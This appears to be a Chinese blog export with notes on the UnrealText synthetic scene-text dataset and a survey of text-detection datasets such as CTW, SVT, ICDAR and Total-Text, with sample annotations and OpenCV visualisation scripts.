    在 UE 4.22 中,加载:Demo/Demo.uproject

    UE 文本资源

    ResourcesBaidu DriveGoogle Drive
    背景图片Link password: 3x3rLink
    字体和语料库Link password: ip8wLink

    jpg

    jpg

    打包的场景可执行文件

    ScenesBaidu DriveGoogle Drive
    All 30scene executablesLink password: br31Link

    jpg

    笔记

    png

    该引擎可以实现照片逼真的照明条件,找到合适的文本区域,并实现自然遮挡(从左到右,用绿色方块标记的放大视图)

    ​ 真实数据成本太高昂了,合成数据是个好的替代品。可以提供更加详细的注释:例如字符级甚至像素级的 Ground Truth,真是太棒了!

    有几种合成算法证明它在文字识别和检测上很好使:


    ​ 目前为止,场景文本检测仍然严重依赖真实世界的数据,合成数据的作用微乎其微。作者认为之前的合成数据算法(在 2D 背景图像上嵌入文本,如 SynthText)存在局限性:

    • 使用现成模型对背景图像的分析可能是粗略和不精确的,错误进一步传播到文本建议模块,并导致文本嵌入到不合适的位置
    • 文本嵌入过程不知道整体图像条件,例如场景的照明和遮挡

    ​ 提出的方案:文本实例 (text instances) 被视为平面多边形网格 (planar polygon meshes),其中文本前景 (text foregrounds) 加载为纹理 (texture)。这些网格被放置在 3D 世界中合适的位置,并作为一个整体与场景一起渲染。

    这种方法的优越之处:

    • 文本和场景一起渲染,实现了逼真的视觉效果,如照明、遮挡和透视变换

    • 该方法可以访问精确的场景信息,例如法线、深度和对象网格,因此可以生成更好的文本区域建议。这些方面对训练 detectors 至关重要

    我们这个方法嘞,它有 3 个组件:

    • A view finding algorithm 一种视图查找算法,探索虚拟场景并生成相机视点,以获得更多样、更自然的背景
    • An environment randomization 一个环境随机化模块,定期改变照明条件,以模拟真实世界的变化
    • A mesh-based text region generation method 一种基于网格的文本区域生成算法,通过探测 3D 网格来为文本找到合适的位置


    SynthText3D 严格遵循 SynthText 方法的设计。

    • SynthText 使用现成的计算机视觉模型来估计背景图像的分割和深度图
    • SynthText3D 使用 3D 引擎提供的地面实况分割和深度地图

    UnrealText 是在 UE4 和 UnrealCV 插件上开发的:

    • 画质逼真
    • 效率高(1~1.5 秒一张)
    • 通用且兼容现成的 3D 场景模型

    png

    共有 4 个模块:

    • Viewfinding 取景器
      • 从 3D 场景的整个空间中自动确定一组合理且不平凡的相机位置和旋转,消除不合适的视点(如从物体网格内部)
    • Environment Randomization 环境随机化
      • 为了产生真实世界的变化,例如照明条件,我们随机更改场景中所有光源的强度、颜色和方向。添加雾条件并随即调整强度
    • Text Region Generation 文本区域生成
      • 通过探测三维世界中的对象网络来找到文本区域,检索 ground truth 法线图以生成初始文本区域提议
      • 使用对象网格将初始建议投影到3D世界中并在其中进行细化
      • 从细化的提议中抽取一个子集进行呈现
    • Text Rendering 渲染文本

    使用 EAST 作为训练对象,基准数据集:

    • ICDAR 2013
    • ICDAR 2015
    • MLT 2017

    实验方案:纯合成数据集

    ​ 我们首先在不同的合成数据集上单独训练 EAST 模型,以直接和定量的方式将我们的方法与以前的方法进行比较。请注意,UnrealText、SynthText3D、SynthText 和 VISD 有不同数量的图像,因此我们还需要控制实验中使用的图像数量。

    10 K 数量:

    Training DataIC15IC13MLT 2017
    SynthText 10K46.360.838.9
    VISD 10K (full)64.374.851.4
    SynthText3D 10K (full)63.475.648.3
    UnrealText 10K65.278.354.2

    完整数量:

    Training DataIC15IC13MLT 2017
    SynthText 800K (full)58.067.744.8
    UnrealText 600K (full)67.880.656.3

    实验方案:补充合成数据

    ​ 所提出的 UnrealText 的一个独特特征是,图像是从 3D 场景模型生成的,而不是真实的背景图像,由于不同的艺术风格,导致潜在的领域差距。我们通过对 UnrealText 数据(5K)和 VISD 数据(5K)进行训练来进行实验,如表所示,这比其他 10K 合成数据集实现了更好的性能。

    ​ UnrealText 和 VISD 的组合也优于 SynthText3D 和 VISD 组合。这一结果表明,我们的虚幻文本是对现有的使用真实图像作为背景的合成数据集的补充。虽然虚幻文本模拟照片逼真的效果,但具有真实背景图像的合成数据可以帮助适应真实世界的数据集。

    Training DataIC15IC13MLT 2017
    SynthText3D 5K + VISD 5K65.478.655.2
    UnrealText 5K + VISD 5K66.980.455.7

    实验方案:结合合成数据和真实数据 合成数据的一个重要作用是作为预训练的数据,并进一步提高特定领域真实数据集的性能。我们首先用不同的合成数据对 EAST 模型进行预训练,然后使用领域数据对模型进行微调。


    实验方案:在完整数据集上预训练 当我们用完整数据集预训练检测器模型时,性能显著提高,证明了我们引擎的可扩展性优势。特别是,EAST 模型在 MLT17 上获得了 74.1 的 F1 分数,这甚至比最近的最先进的结果更好,包括 CRAFT 的 73.9 和 LOMO 的 73.1。尽管差距不大,但可以声称 EAST 模型在我们的合成数据集的帮助下恢复了最先进的性能。

    png

    运行

    准备一个 Unreal 4.22:

    jpg

    unrealcv/unrealcv at 4.22 (github.com) 下载 UnrealCV 源码(4.16 以上版本没有 Release 的下载,要自行编译,仓库里一定要选择 4.22 版本的,不然会寄):

    jpg

    命令行下编译 UnrealCV 插件:

    conda create -n unreal python=3.9
    conda activate unreal
    cd 下载仓库的目录
    python build.py

    编译得到文件:

    jpg

    BUILD SUCCESSFUL
    AutomationTool exiting with ExitCode=0 (Success)

    Link 下载得到演示项目:DemoProject.tar_5.gz,解压得到 Demo Project:

    jpg

    Plugins,把之前编译好的 UnrealCV 插件替换过去。

    可以进项目了!

    jpg

    ]]>
    + 资源

    原文

    代码

    官网

    数据集

    LanuagesNum of ImagesNum of TextBaidu DriveGoogle Drive
    English/Latin72.8 万~20MLink password: 2h8dLink
    Multilingual67.4 万~18MLink password: tddlLink

    Multilingual 多语言版本包含 10 种语言:阿拉伯语,英语,法语,中文,德语,韩语,日语,意大利语,孟加拉语,印地语

    这两个数据集大概有 150 GB 左右,所以把它拆成了 130 个左右的文件,它们的组织方式如下:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    ./
    +---sub_0
    +---imgs
    | 0.jpg
    | 1.jpg
    | ...
    |
    +---labels
    | 0.json
    | 1.json
    | ...
    |
    +---sub_1
    +---sub_2
    +---sub_3
    ...
    +---sub_100
    ...

    标签按以下格式存储:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    {
    "imgfile":str path to the corresponding image file, e.g. "imgs/0.jpg",
    "bbox": List[
    word_i(8 float):[x0, y0, x1, y1, x2, y2, x3, x4]
    (from upper left corner, clockwise),
    ],
    "cbox": List[
    char_i(8 float):[x0, y0, x1, y1, x2, y2, x3, x4]
    (from upper left corner, clockwise),
    ],
    "text": List[str]
    }

    举例:

    jpg

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    {
    "imgfile": "imgs/54.jpg",
    "bbox": [[478, 188, 526, 234, 526, 248, 477, 203], [479, 223, 527, 265, 526, 281, 477, 239], [474, 251, 527, 295, 527, 307, 473, 264],

    ......

    , [590, 532, 781, 492, 799, 547, 598, 579], [809, 489, 844, 482, 860, 524, 823, 530], [214, 652, 274, 644, 267, 674, 207, 679]],
    "cbox": [[478, 188, 526, 234, 526, 248, 477, 203], [479, 223, 527, 265, 526, 281, 477, 239], [474, 251, 527, 295, 527, 307, 473, 264],

    ......

    , [236, 437, 291, 457, 286, 475, 229, 456], [222, 476, 274, 492, 268, 514, 214, 500], [457, 560, 572, 536, 578, 573, 459, 593], [590, 532, 781, 492, 799, 547, 598, 579], [809, 489, 844, 482, 860, 524, 823, 530], [214, 652, 274, 644, 267, 674, 207, 679]],
    "text": ["\"process", "Caloger", "billowin", "746", "Sasc", "(Twitter", "AlHarth", "corporation", "Val", "MARKET", "habits", "He", "\u201cT", "(tr", "hu", "180", "Dr", "Ch", "sic", "Ab", "Fo", "in", "Temes,", "Ar", "F3D2Ms)", "Viaduct\"", "\u2018An", "dracae", "\u00d8land", "\"Dev", "throwback", "locus", "GB)", "Central\u2013St", "USHL/NH", "touc", "Sele", "flat", "tsao", "Novn", "Eckh", "French", "Melapia", "E", "floor"],
    "is_difficult": [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
    }

    jpg

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    {
    "imgfile": "imgs/15.jpg",
    "bbox": [[772, 225, 807, 221, 806, 233, 771, 237], [811, 217, 888, 207, 886, 228, 810, 236],

    ......

    , [815, 301, 857, 303, 855, 314, 814, 311], [862, 304, 894, 305, 891, 316, 860, 314], [900, 306, 931, 307, 927, 322, 897, 319]],
    "cbox": [[772, 226, 773, 226, 773, 236, 771, 237], [774, 226, 779, 225, 778, 234, 773, 235],

    ......

    , [892, 309, 893, 309, 891, 316, 890, 316], [900, 306, 912, 306, 909, 318, 897, 317], [913, 306, 922, 307, 919, 318, 910, 318], [922, 311, 928, 311, 925, 321, 920, 320], [927, 320, 928, 320, 927, 322, 926, 322]],
    "text": ["[Mondial]", "\u092d\u0942\u0935\u093f\u091c\u094d\u091e\u093e\u0928\u0940\u0913\u0901", "\u0926\u0928\u093f\u092f\u093e\u0932", "1011)",

    ......

    , "31,438", "6/8/2006", "\u0646\u0628\u064a\u0644", "\u0646\u0627\u0637\u0642\u062a\u0627\u0646", "\u0645\u0647", "\u092e\u0948\u091f\u0930\u0928\u093f\u0916", "\u0935\u093f\u091a\u0947\u091c", "\u091b\u093f\u091c\u093c"],
    "is_difficult": [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
    }

    感觉只能处理一定的光照和透视,不是很好地适应模型表面的纹理。使用 Unicode 字符编码处理非拉丁文本。

    可视化

    写了个代码对这个数据集进行可视化,感觉 bboxcbox 的属性是完全一样的?(有的数据集中 bbox 是按行分类,cbox 是按字分割)

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    import cv2
    import os
    import matplotlib.pyplot as plt
    import json
    import numpy as np

    index = 93

    image_dir = r'E:\dataset\UnrealText\sub_103\imgs\\'
    label_dir = r'E:\dataset\UnrealText\sub_103\labels\\'

    image_path = os.path.join(image_dir, str(index) + '.jpg')
    label_path = os.path.join(label_dir, str(index) + '.json')

    image_origin = cv2.imread(image_path)
    image_bbox = image_origin.copy()
    image_cbox = image_origin.copy()
    height, width, _ = image_origin.shape

    with open(label_path, 'r') as f:
    data = json.load(f)

    for i, b in enumerate(data['bbox']):
    points = np.array([b[i:i+2] for i in range(0, len(b), 2)])
    cv2.polylines(image_bbox, [points], isClosed=True, color=(255, 0, 0), thickness=2)
    for p in points:
    cv2.circle(image_bbox, (p[0], p[1]), int(min(height, width) / 150), (0, 255, 255), -1)
    cv2.putText(image_bbox, data['text'][i], (points[0][0], points[0][1] + int(min(height, width) / 50)), cv2.FONT_HERSHEY_SIMPLEX,
    min(height, width) / 1000, (255, 0, 255), int(min(height, width) / 500))

    for i, c in enumerate(data['cbox']):
    points = np.array([c[i:i+2] for i in range(0, len(c), 2)])
    cv2.polylines(image_cbox, [points], isClosed=True, color=(255, 0, 0), thickness=2)
    for p in points:
    cv2.circle(image_cbox, (p[0], p[1]), int(min(height, width) / 150), (0, 255, 255), -1)
    # cv2.putText(image_cbox, data['text'][i], (points[0][0], points[0][1] + int(min(height, width) / 50)), cv2.FONT_HERSHEY_SIMPLEX,
    # min(height, width) / 1000, (255, 0, 255), int(min(height, width) / 500))


    fig, axes = plt.subplots(nrows=3, ncols=1, figsize=(32, 18))
    axes = axes.flatten()

    axes[0].imshow(cv2.cvtColor(image_origin, cv2.COLOR_BGR2RGB))
    axes[0].axis('off')
    axes[0].set_title('Origin')

    axes[1].imshow(cv2.cvtColor(image_bbox, cv2.COLOR_BGR2RGB))
    axes[1].axis('off')
    axes[1].set_title('bbox')

    axes[2].imshow(cv2.cvtColor(image_cbox, cv2.COLOR_BGR2RGB))
    axes[2].axis('off')
    axes[2].set_title('cbox')

    plt.tight_layout()
    plt.show()

    png

    UE 演示项目

    Scene NameBaidu DriveGoogle Drive
    Realistic RenderingLink password: wgjaLink

    jpg

    在 UE 4.22 中,加载:Demo/Demo.uproject

    UE 文本资源

    ResourcesBaidu DriveGoogle Drive
    背景图片Link password: 3x3rLink
    字体和语料库Link password: ip8wLink

    jpg

    jpg

    打包的场景可执行文件

    ScenesBaidu DriveGoogle Drive
    All 30scene executablesLink password: br31Link

    jpg

    笔记

    png

    该引擎可以实现照片逼真的照明条件,找到合适的文本区域,并实现自然遮挡(从左到右,用绿色方块标记的放大视图)

    ​ 真实数据成本太高昂了,合成数据是个好的替代品。可以提供更加详细的注释:例如字符级甚至像素级的 Ground Truth,真是太棒了!

    有几种合成算法证明它在文字识别和检测上很好使:


    ​ 目前为止,场景文本检测仍然严重依赖真实世界的数据,合成数据的作用微乎其微。作者认为之前的合成数据算法(在 2D 背景图像上嵌入文本,如 SynthText)存在局限性:

    • 使用现成模型对背景图像的分析可能是粗略和不精确的,错误进一步传播到文本建议模块,并导致文本嵌入到不合适的位置
    • 文本嵌入过程不知道整体图像条件,例如场景的照明和遮挡

    ​ 提出的方案:文本实例 (text instances) 被视为平面多边形网格 (planar polygon meshes),其中文本前景 (text foregrounds) 加载为纹理 (texture)。这些网格被放置在 3D 世界中合适的位置,并作为一个整体与场景一起渲染。

    这种方法的优越之处:

    • 文本和场景一起渲染,实现了逼真的视觉效果,如照明、遮挡和透视变换

    • 该方法可以访问精确的场景信息,例如法线、深度和对象网格,因此可以生成更好的文本区域建议。这些方面对训练 detectors 至关重要

    我们这个方法嘞,它有 3 个组件:

    • A view finding algorithm 一种视图查找算法,探索虚拟场景并生成相机视点,以获得更多样、更自然的背景
    • An environment randomization 一个环境随机化模块,定期改变照明条件,以模拟真实世界的变化
    • A mesh-based text region generation method 一种基于网格的文本区域生成算法,通过探测 3D 网格来为文本找到合适的位置


    SynthText3D 严格遵循 SynthText 方法的设计。

    • SynthText 使用现成的计算机视觉模型来估计背景图像的分割和深度图
    • SynthText3D 使用 3D 引擎提供的地面实况分割和深度地图

    UnrealText 是在 UE4 和 UnrealCV 插件上开发的:

    • 画质逼真
    • 效率高(1~1.5 秒一张)
    • 通用且兼容现成的 3D 场景模型

    png

    共有 4 个模块:

    • Viewfinding 取景器
      • 从 3D 场景的整个空间中自动确定一组合理且不平凡的相机位置和旋转,消除不合适的视点(如从物体网格内部)
    • Environment Randomization 环境随机化
      • 为了产生真实世界的变化,例如照明条件,我们随机更改场景中所有光源的强度、颜色和方向。添加雾条件并随即调整强度
    • Text Region Generation 文本区域生成
      • 通过探测三维世界中的对象网络来找到文本区域,检索 ground truth 法线图以生成初始文本区域提议
      • 使用对象网格将初始建议投影到3D世界中并在其中进行细化
      • 从细化的提议中抽取一个子集进行呈现
    • Text Rendering 渲染文本

    使用 EAST 作为训练对象,基准数据集:

    • ICDAR 2013
    • ICDAR 2015
    • MLT 2017

    实验方案:纯合成数据集

    ​ 我们首先在不同的合成数据集上单独训练 EAST 模型,以直接和定量的方式将我们的方法与以前的方法进行比较。请注意,UnrealText、SynthText3D、SynthText 和 VISD 有不同数量的图像,因此我们还需要控制实验中使用的图像数量。

    10 K 数量:

    Training DataIC15IC13MLT 2017
    SynthText 10K46.360.838.9
    VISD 10K (full)64.374.851.4
    SynthText3D 10K (full)63.475.648.3
    UnrealText 10K65.278.354.2

    完整数量:

    Training DataIC15IC13MLT 2017
    SynthText 800K (full)58.067.744.8
    UnrealText 600K (full)67.880.656.3

    实验方案:补充合成数据

    ​ 所提出的 UnrealText 的一个独特特征是,图像是从 3D 场景模型生成的,而不是真实的背景图像,由于不同的艺术风格,导致潜在的领域差距。我们通过对 UnrealText 数据(5K)和 VISD 数据(5K)进行训练来进行实验,如表所示,这比其他 10K 合成数据集实现了更好的性能。

    ​ UnrealText 和 VISD 的组合也优于 SynthText3D 和 VISD 组合。这一结果表明,我们的虚幻文本是对现有的使用真实图像作为背景的合成数据集的补充。虽然虚幻文本模拟照片逼真的效果,但具有真实背景图像的合成数据可以帮助适应真实世界的数据集。

    Training DataIC15IC13MLT 2017
    SynthText3D 5K + VISD 5K65.478.655.2
    UnrealText 5K + VISD 5K66.980.455.7

    实验方案:结合合成数据和真实数据 合成数据的一个重要作用是作为预训练的数据,并进一步提高特定领域真实数据集的性能。我们首先用不同的合成数据对 EAST 模型进行预训练,然后使用领域数据对模型进行微调。


    实验方案:在完整数据集上预训练 当我们用完整数据集预训练检测器模型时,性能显著提高,证明了我们引擎的可扩展性优势。特别是,EAST 模型在 MLT17 上获得了 74.1 的 F1 分数,这甚至比最近的最先进的结果更好,包括 CRAFT 的 73.9 和 LOMO 的 73.1。尽管差距不大,但可以声称 EAST 模型在我们的合成数据集的帮助下恢复了最先进的性能。

    png

    运行

    准备一个 Unreal 4.22:

    jpg

    unrealcv/unrealcv at 4.22 (github.com) 下载 UnrealCV 源码(4.16 以上版本没有 Release 的下载,要自行编译,仓库里一定要选择 4.22 版本的,不然会寄):

    jpg

    命令行下编译 UnrealCV 插件:

    1
    2
    3
    4
    conda create -n unreal python=3.9
    conda activate unreal
    cd 下载仓库的目录
    python build.py

    编译得到文件:

    jpg

    1
    2
    BUILD SUCCESSFUL
    AutomationTool exiting with ExitCode=0 (Success)

    Link 下载得到演示项目:DemoProject.tar_5.gz,解压得到 Demo Project:

    jpg

    Plugins,把之前编译好的 UnrealCV 插件替换过去。

    可以进项目了!

    jpg

    ]]>
    @@ -6605,7 +6605,7 @@ /posts/Dataset-%E6%94%B6%E9%9B%86%E4%B8%80%E4%B8%8B%E6%96%87%E6%9C%AC%E7%9A%84%E5%90%84%E7%A7%8D%E6%95%B0%E6%8D%AE%E9%9B%86/ - 前言

    ​ 收集一下有关文本的各种数据集!感谢师兄的分享。

    正文

    真实数据集

    CTW 数据集 (Chinese Text in the Wild)

    一个自然场景下的中文字符数据集。

    ​ 资源:

    ​ 包含:

    • 32,285 张高分辨率图像(high resolution images)
    • 1,018,402 个字符实例(character instances)
    • 3850 种汉字(character categories)
    • 6 种类别(attributes)

    ​ 数据集结构:

    webp

    • 训练集 + 验证集:images-trainval
    • 测试集:images-test
    • 预训练好的模型:trained-models
      • alexnet
      • inception
      • overfeat
      • resnet
      • vgg
      • yolo
    • 注释文档:ctw-annotations

    webp

    ​ 举例,对于训练数据集下的文件 0000172.jpg

    webp

    0000172.jpg
    {"annotations": [[
    {
    "adjusted_bbox": [140.26028096262758, 897.1957001682758, 22.167573140645146, 38.36424196832945],
    "attributes": ["distorted", "raised"],
    "is_chinese": true,
    "polygon": [[140.26028096262758, 896.7550603352049], [162.42785410327272, 898.0769798344178], [162.42785410327272, 935.7929346470926], [140.26028096262758, 935.0939571156308]],
    "text": "\u660e"
    },
    {
    "adjusted_bbox": [162.42785410327272, 898.5416545674744, 23.376713493771263, 37.74268246537315],
    "attributes": ["distorted", "raised"],
    "is_chinese": true,
    "polygon": [[162.42785410327272, 898.0769798344178], [185.80456759704398, 899.4710040335876], [185.80456759704398, 936.5300382257251], [162.42785410327272, 935.7929346470926]],
    "text": "\u6d77"
    },
    ……
    "image_id": "0000172", "width": 2048}

    ​ 对应的注释,每个字都有:

    • adjusted_bbox:调整后的边界框

    • attributes:文字属性

      • distorted:扭曲
      • raised:浮雕
      • occluded:被遮挡
      • bgcomplex:复杂背景
      • handwritten:手写
      • wordart:艺术字
    • is_chinese:是否为中文

    • polygon:实际边界框

    • text:以 Unicode 形式存储的中文

    SVT (Street View Text Dataset)

    The Street View Text (SVT) dataset was harvested from Google Street View. Image text in this data exhibits high variability and often has low resolution. In dealing with outdoor street level imagery, we note two characteristics.

    (1) Image text often comes from business signage and

    (2) business names are easily available through geographic business searches.

    These factors make the SVT set uniquely suited for word spotting in the wild: given a street view image, the goal is to identify words from nearby businesses.

    街景文本SVT)数据集从谷歌街景中获取。该数据中的图像文本表现出很高的变异性,而且往往分辨率很低。在处理户外街景图像时,我们注意到两个特点。

    (1) 图像文本通常来自于商业招牌,以及

    (2) 企业名称很容易通过地理上的商业搜索获得。

    这些因素使得 SVT 集独特地适合于在野外发现单词:给定一个街景图像,目标是识别附近企业的单词。

    ​ 资源:

    ​ 举例,对于数据集下的文件 17_18.jpg

    webp

    17_18.jpg

    ​ 对应的 Ground Truth,一个单词一个文本框,还包含了地址、环境等信息:

    <image>
    <imageName>img/17_18.jpg</imagesName>
    <address>420 South 1st Street San Jose CA 95112</address>
    <lex>SOUTH,FIRST,BILLIARDS,CLUB,AND,LOUNGE,AGENDA,RESTAURANT,BAR,RAMADA,LIMITED,SAN,JOSE,WET,NIGHTCLUB,MOTIF,ANNO,DOMINI,EULIPIA,DOWNTOWN,YOGA,SHALA,WHIPSAW,INC,ZOE,SAINTE,CLAIRE,HOTEL,SCORES,SPORTS,GRILL,WORKS,SPY,MUSEUM,QUILTS,TEXTILES,MIAMI,BEACH,STAGE,COMPANY,CACTUS,ANGELS,DAI,THANH,SUPERMARKET</lex>
    <Resolution x="1024" y="768"/>
    <taggedRectangles>
    <taggedRectangle height="41" width="152" x="480" y="403">
    <tag>BILLIARDS</tag>
    </taggedRectangle>
    <taggedRectangle height="33" width="78" x="407" y="410">
    <tag>FIRST</tag>
    </taggedRectangle>
    <taggedRectangle height="30" width="85" x="322" y="416">
    <tag>SOUTH</tag>
    </taggedRectangle>
    </taggedRectangles>
    </images>

    ICDAR

    ​ 资源:

    Downloads - Focused Scene Text

    Task 2.1: Text Localization (2013 edition)
    • 训练集 229 张图片
    • 测试集 233 张图片

    ​ 举例,对于训练数据集下的文件 img_1.jpg

    webp

    img_1.jpg

    ​ 对应的 Ground Truth gt_img_1.txt

    38, 43, 920, 215, "Tiredness"
    275, 264, 665, 450, "kills"
    0, 699, 77, 830, "A"
    128, 705, 483, 839, "short"
    542, 710, 938, 841, "break"
    87, 884, 457, 1021, "could"
    517, 919, 831, 1024, "save"
    166, 1095, 468, 1231, "your"
    530, 1069, 743, 1206, "life"

    ​数据集可视化代码:

    import cv2
    import os
    import matplotlib.pyplot as plt
    import numpy as np

    index = 1

    image_dir = r'XXX/ICDAR 2013/Challenge2_Test_Task12_Images/'
    label_dir = r'XXX/ICDAR 2013/Challenge2_Test_Task1_GT/'

    image_path = os.path.join(image_dir, 'img_' + str(index) + '.jpg')
    label_path = os.path.join(label_dir, 'gt_img_' + str(index) + '.txt')

    image_origin = cv2.imread(image_path)
    image = image_origin.copy()
    height, width, _ = image.shape
    label_file = open(label_path, 'r')
    annotations = label_file.readlines()
    label_file.close()

    for annotation in annotations:
    coords = list(map(int, annotation.split(',')[:-1]))
    transcriptions = annotation.split(',')[-1][2:-2]
    points = np.array([(coords[i], coords[i+1]) for i in range(0, len(coords), 2)])
    cv2.rectangle(image, (points[0][0], points[0][1]), (points[1][0], points[1][1]), (255, 0, 0), 2)
    for p in points:
    cv2.circle(image, (p[0], p[1]), int(min(height, width) / 150), (0, 255, 255), -1)
    cv2.putText(image, transcriptions, (points[0][0], points[0][1] - int(min(height, width) / 150)), cv2.FONT_HERSHEY_SIMPLEX,
    min(height, width) / 1000, (0, 255, 0), int(min(height, width) / 500))

    fig, axes = plt.subplots(nrows=1, ncols=2, figsize=(16, 9))
    axes = axes.flatten()

    axes[0].imshow(cv2.cvtColor(image_origin, cv2.COLOR_BGR2RGB))
    axes[0].axis('off')
    axes[0].set_title('Origin')

    axes[1].imshow(cv2.cvtColor(image, cv2.COLOR_BGR2RGB))
    axes[1].axis('off')
    axes[1].set_title('Annotation')

    plt.tight_layout()
    plt.show()

    webp

    Task 2.2: Text Segmentation (2013 edition)

    ​ 数据集和 2.1 一样,只不过 Ground Truth 是 segmentation masks gt_img_1.png

    webp

    gt_img_1.png
    Task 2.3: Word Recognition (2013 edition)
    • 训练集 848 张单词图片:Challenge2_Training_Task3_Images_GT
    • 测试集 1095 张单词图片:Challenge2_Test_Task3_ImagesChallenge2_Test_Task3_GT.txt

    ​ 这些图片都是从之前的数据集里裁切出来的。

    ​ 举例,对于训练数据集下的文件 word_1.jpg

    webp

    word_1.png

    ​ 对应的 Ground Truth gt.txt 里的一行:

    word_1.png, "PROPER"
    Task 2.4: End to End (2015 edition)

    想让网络识别单词,并且提供了单词库?

    • 训练集 229 张图片
    • 测试集 233 张图片

    ​ 图片img_1.jpg,对应的 Ground Truth gt_img_1.txt 和词汇表 voc_img_1.txt

    webp

    img_1.jpg、gt_img_1.txt、voc_img_1.txt

    Downloads - Incidental Scene Text

    Task 4.1: Text Localization (2015 edition)

    ​ 图像质量真是刁钻啊 orz

    • 训练集 1000 张图片
    • 测试集 500 张图片

    ​ 举例,对于测试数据集下的文件 img_2.jpg

    webp

    img_2.jpg

    ​ 对应的 Ground Truth gt_img_2.txt

    790,302,903,304,902,335,790,335,JOINT
    822,288,872,286,871,298,823,300,yourself
    641,138,657,139,657,151,641,151,###
    669,139,693,140,693,154,669,153,154
    700,141,723,142,723,155,701,154,197
    637,101,721,106,722,115,637,110,###
    668,157,693,158,693,170,668,170,727
    636,155,661,156,662,169,636,168,198
    660,82,700,85,700,99,660,96,20029
    925,252,973,254,973,262,925,262,###
    789,284,818,284,818,297,789,297,Free
    875,286,902,289,903,298,875,298,from
    791,337,863,337,863,364,791,364,PAIN
    794,445,818,445,818,473,794,473,###
    922,440,962,442,963,462,922,463,###
    924,476,967,476,968,489,924,491,###
    924,505,962,506,965,518,923,519,###
    847,524,887,524,887,555,847,555,###
    791,474,822,474,822,500,791,500,###
    780,582,910,576,909,583,780,588,###
    854,456,902,455,902,465,854,467,###
    854,467,903,467,903,480,854,480,###

    ​数据集可视化代码:

    import cv2
    import os
    import matplotlib.pyplot as plt
    import numpy as np

    index = 463

    image_dir = r'XXX/ICDAR_2015/test_img/'
    label_dir = r'XXX/ICDAR_2015/test_gt/'

    image_path = os.path.join(image_dir, 'img_' + str(index) + '.jpg')
    label_path = os.path.join(label_dir, 'gt_img_' + str(index) + '.txt')

    image_origin = cv2.imread(image_path)
    image = image_origin.copy()
    height, width, _ = image.shape
    label_file = open(label_path, 'r')
    annotations = label_file.readlines()
    label_file.close()

    for annotation in annotations:
    coords = list(map(int, annotation.split(',')[:-1]))
    transcriptions = annotation.split(',')[-1]
    points = np.array([(coords[i], coords[i+1]) for i in range(0, len(coords), 2)])
    cv2.polylines(image, [points], isClosed=True, color=(255, 0, 0), thickness=2)
    for p in points:
    cv2.circle(image, (p[0], p[1]), int(min(height, width) / 150), (0, 255, 255), -1)

    cv2.putText(image, transcriptions, (points[0][0], points[0][1] - int(min(height, width) / 150)), cv2.FONT_HERSHEY_SIMPLEX,
    min(height, width) / 1000, (0, 255, 0), int(min(height, width) / 500))

    fig, axes = plt.subplots(nrows=1, ncols=2, figsize=(16, 9))
    axes = axes.flatten()

    axes[0].imshow(cv2.cvtColor(image_origin, cv2.COLOR_BGR2RGB))
    axes[0].axis('off')
    axes[0].set_title('Origin')

    axes[1].imshow(cv2.cvtColor(image, cv2.COLOR_BGR2RGB))
    axes[1].axis('off')
    axes[1].set_title('Annotation')

    plt.tight_layout()
    plt.show()

    webp

    1111,459,1266,495,1259,586,1104,550,FESTIVE
    1100,523,1261,603,1244,719,1083,639,SALE
    Task 4.2: Text Segmentation (N/A)

    ​ 不可用。

    Task 4.3: Word Recognition (2015 edition)

    ​ 从上一个数据集中裁剪出单词图片。

    • 训练集 4468 张裁剪好的单词图片
    • 测试集 2077 张裁剪好的单词图片

    ​ 举例,对于测试数据集下的文件 word_10.png

    webp

    word_10.png

    ​ 对应 Challenge4_Test_Task3_GT.txt 里的一行:

    word_10.png, "PAIN"
    Task 4.4: End to End (2015 edition)

    ​ emmmm 我感觉就是之前的整合,多了一个词汇表。

    • 训练集 1000 张图片
    • 测试集 500 张图片

    webp

    ICDAR2017 Competition on Reading Chinese Text in the Wild (RCTW-17)

    这里面的图像是有够杂的……

    资源:

    webp

    ​ 举例,对于训练数据集下的文件 image_0.jpg

    webp

    image_0.jpg

    ​ 对应的 Ground Truth image_0.txt

    ​ 包围框,是否有可识别的文字,对应文字

    390,902,1856,902,1856,1225,390,1225,0,"金氏眼镜"
    1875,1170,2149,1170,2149,1245,1875,1245,0,"创于 1989"
    2054,1277,2190,1277,2190,1323,2054,1323,0,"城建店"
    768,1648,987,1648,987,1714,768,1714,0,"金氏眼"
    897,2152,988,2152,988,2182,897,2182,0,"金氏眼镜"
    1457,2228,1575,2228,1575,2259,1457,2259,0,"金氏眼镜"
    1858,2218,1966,2218,1966,2250,1858,2250,0,"金氏眼镜"
    231,1853,308,1843,309,1885,230,1899,1,"谢#惠顾"
    125,2270,180,2270,180,2288,125,2288,1,"###"
    106,2297,160,2297,160,2316,106,2316,1,"###"
    22,2363,82,2363,82,2383,22,2383,1,"###"
    524,2511,837,2511,837,2554,524,2554,1,"###"
    455,2456,921,2437,920,2478,455,2501,0,"欢迎光临"

    Total-Text

    ​ 资源:Total-Text Dataset | Papers With Code

    ​ 弯曲文本数据集:

    • 训练集 1255 张图片
    • 测试集 300 张图片

    ​ 大部分英文文本,少部分中文文本。

    ​ 举例,对于训练数据集下的文件 img11.jpg

    webp

    img11.jpg

    ​ 对应的 Character_Level_Mask Ground Truth img11.jpg

    webp

